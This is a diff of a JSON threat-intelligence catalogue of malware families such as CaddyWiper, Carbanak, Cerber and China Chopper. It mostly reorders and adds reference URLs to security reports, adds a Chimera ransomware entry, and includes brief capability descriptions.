- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.splunk.com/en_us/blog/security/threat-update-caddywiper.html",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/",
- "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://n0p.me/2022/03/2022-03-26-caddywiper/",
 "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
- "https://www.mandiant.com/resources/blog/gru-rise-telegram-minions",
+ "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
+ "https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/",
+ "https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine",
+ "https://cybersecuritynews.com/destructive-data-wiper-malware/",
 "https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/"
+ "https://www.splunk.com/en_us/blog/security/threat-update-caddywiper.html",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://securityintelligence.com/posts/caddywiper-malware-targeting-ukrainian-organizations/",
+ "https://cert.gov.ua/article/39518",
+ "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/"
 ],
 "synonyms": [
 "KillDisk.NCX"
@@ -16951,8 +17767,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf",
- "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets"
+ "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf"
 ],
 "synonyms": [
 "Cadelle"
@@ -16967,8 +17783,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn",
- "https://twitter.com/8th_grey_owl/status/1357550261963689985",
 "https://www.datanet.co.kr/news/articleView.html?idxno=133346",
+ "https://twitter.com/8th_grey_owl/status/1357550261963689985",
 "https://www.youtube.com/watch?v=3cUWjojQXWE"
 ],
 "synonyms": [],
@@ -16997,11 +17813,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader",
+ "https://blog.group-ib.com/prometheus-tds",
 "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
 "https://orangecyberdefense.com/global/blog/cybersoc/in-the-eye-of-our-cybersoc-campo-loader-analysis-and-detection-perspectives/",
- "https://blog.group-ib.com/prometheus-tds",
- "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
- "https://unit42.paloaltonetworks.com/bazarloader-malware/"
+ "https://unit42.paloaltonetworks.com/bazarloader-malware/",
+ "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/"
 ],
 "synonyms": [],
 "type": []
@@ -17055,29 +17871,29 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak",
- "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html",
- "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
- "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
- "https://threatintel.blog/OPBlueRaven-Part2/",
- "https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
- "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html",
- "https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://threatintel.blog/OPBlueRaven-Part1/",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html",
- "https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/",
- "https://www.prodaft.com/m/reports/FIN7_TLPCLEAR.pdf",
- "https://www.mandiant.com/resources/evolution-of-fin7",
- "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
 "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
- "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html",
+ "https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.prodaft.com/m/reports/FIN7_TLPCLEAR.pdf",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html",
+ "https://threatintel.blog/OPBlueRaven-Part2/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
 "https://unit42.paloaltonetworks.com/atoms/mulelibra/",
- "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html"
+ "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html",
+ "https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/",
+ "https://threatintel.blog/OPBlueRaven-Part1/",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://www.mandiant.com/resources/evolution-of-fin7",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html"
 ],
 "synonyms": [
 "Anunak",
@@ -17093,12 +17909,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp",
- "https://blog.avast.com/2013/04/08/carberp_epitaph/",
- "https://web.archive.org/web/20150713145858/http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf",
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
 "https://cdn1.esetstatic.com/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf",
 "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
- "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree"
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://blog.avast.com/2013/04/08/carberp_epitaph/",
+ "https://web.archive.org/web/20150713145858/http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -17107,16 +17923,16 @@
 "value": "Carberp"
 },
 {
- "description": "Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed “Carp” which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.",
+ "description": "Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed \u201cCarp\u201d which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat",
- "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412",
 "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf",
- "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
 "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
 "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/"
 ],
 "synonyms": [],
@@ -17184,7 +18000,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.catb",
 "https://minerva-labs.com/blog/new-catb-ransomware-employs-2-year-old-dll-hijacking-technique-to-evade-detection/",
- "https://www.sentinelone.com/blog/decrypting-catb-ransomware-analyzing-their-latest-attack-methods/"
+ "https://www.sentinelone.com/blog/decrypting-catb-ransomware-analyzing-their-latest-attack-methods/",
+ "http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -17211,26 +18028,26 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor",
 "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities",
- "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms",
- "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident",
- "https://risky.biz/whatiswinnti/",
- "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
- "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/",
- "https://blog.avast.com/progress-on-ccleaner-investigation",
- "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer",
+ "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html",
 "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/",
- "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident",
 "https://twitter.com/craiu/status/910148928796061696",
- "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/",
- "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/",
- "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor",
- "https://stmxcsr.com/persistence/print-processor.html",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
+ "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms",
+ "https://risky.biz/whatiswinnti/",
 "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
- "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html"
+ "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
+ "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/",
+ "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/",
+ "https://stmxcsr.com/persistence/print-processor.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
+ "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer",
+ "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/",
+ "https://blog.avast.com/progress-on-ccleaner-investigation",
+ "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor",
+ "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident",
+ "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident",
+ "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities",
+ "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/"
 ],
 "synonyms": [
 "DIRTCLEANER"
@@ -17273,22 +18090,23 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber",
- "https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
 "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html",
- "https://www.youtube.com/watch?v=y8Z9KnL8s8s",
+ "https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
 "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/",
- "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.justice.gov/usao-dc/press-release/file/1021186/download",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.youtube.com/watch?v=y8Z9KnL8s8s",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/",
+ "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf",
+ "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html",
 "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus"
 ],
 "synonyms": [],
@@ -17314,8 +18132,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ceta_rat",
- "https://blogs.quickheal.com/cetarat-apt-group-targeting-the-government-agencies/",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388"
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
+ "https://blogs.quickheal.com/cetarat-apt-group-targeting-the-government-agencies/"
 ],
 "synonyms": [],
 "type": []
@@ -17341,7 +18159,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaes",
- "https://decoded.avast.io/anhho/chasing-chaes-kill-chain/"
+ "https://decoded.avast.io/anhho/chasing-chaes-kill-chain/",
+ "https://blog.morphisec.com/chaes4-new-chaes-malware-variant-targeting-financial-and-logistics-customers"
 ],
 "synonyms": [],
 "type": []
@@ -17354,10 +18173,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot",
- "https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/",
 "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/",
- "https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec",
+ "https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/",
 "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack",
+ "https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec",
 "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/"
 ],
 "synonyms": [],
@@ -17384,16 +18203,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos",
+ "https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html",
+ "https://twitter.com/vinopaljiri/status/1519645742440329216",
+ "https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/",
 "https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html",
+ "https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-in-fake-minecraft-alt-list-brings-destruction",
+ "https://blog.talosintelligence.com/new-threat-actor-using-yashma-ransomware/",
+ "https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia",
 "https://www.bleepingcomputer.com/news/security/roblox-game-pass-store-used-to-sell-ransomware-decryptor/",
 "https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging",
- "https://brianstadnicki.github.io/posts/malware-chaos-ransomware-v4/",
 "https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree",
- "https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-in-fake-minecraft-alt-list-brings-destruction",
- "https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html",
- "https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia",
- "https://twitter.com/vinopaljiri/status/1519645742440329216",
- "https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/"
+ "https://brianstadnicki.github.io/posts/malware-chaos-ransomware-v4/"
 ],
 "synonyms": [
 "FakeRyuk",
@@ -17406,13 +18226,13 @@
 "value": "Chaos (Windows)"
 },
 {
- "description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.",
+ "description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim\u2019s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone",
 "https://github.com/TheEnergyStory/malware_analysis/tree/master/TajMahal",
- "https://securelist.com/project-tajmahal/90240/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/"
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://securelist.com/project-tajmahal/90240/"
 ],
 "synonyms": [
 "Taj Mahal"
@@ -17440,12 +18260,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches",
- "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
 "https://www.jpcert.or.jp/magazine/acreport-ChChes.html",
- "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html",
 "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html"
+ "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/",
+ "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html"
 ],
 "synonyms": [
 "HAYMAKER",
@@ -17461,9 +18281,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray",
+ "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf",
 "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-045c",
- "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf"
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045c"
 ],
 "synonyms": [
 "CROWDEDFLOUNDER"
@@ -17492,8 +18312,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/",
- "https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html"
+ "https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/"
 ],
 "synonyms": [
 "cherry_picker",
@@ -17518,84 +18338,99 @@
 "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493",
 "value": "ChewBacca"
 },
+ {
+ "description": "According to PCrisk, Chimera is a ransomware virus that encrypts files stored on infected systems. It is distributed using various false job applications, business offers, and infected email attachments. After encrypting the files, Chimera adds a . crypt extension to each file.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chimera",
+ "https://www.malwarebytes.com/blog/news/2015/12/inside-chimera-ransomware-the-first-doxingware-in-wild"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "830b0526-8e3b-4369-9677-9f8a31ca5ded",
+ "value": "Chimera"
+ },
 {
 "description": "a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper",
- "https://attack.mitre.org/groups/G0096",
- "https://redcanary.com/blog/microsoft-exchange-attacks",
- "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits",
- "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers",
- "https://www.youtube.com/watch?v=rn-6t7OygGk",
- "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html",
- "https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968",
- "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/",
+ "https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders",
+ "https://twitter.com/ESETresearch/status/1366862946488451088",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-259a",
- "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
- "https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/",
+ "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/",
+ "https://redcanary.com/blog/microsoft-exchange-attacks",
+ "https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
+ "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Backdoor%2Bvia%2BXFF%2BMysterious%2BThreat%2BActor%2BUnder%2BRadar.pdf",
+ "https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/",
+ "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html",
+ "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
+ "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
+ "https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf",
+ "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
+ "https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
+ "https://twitter.com/CyberRaiju/status/1373582619707867136",
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
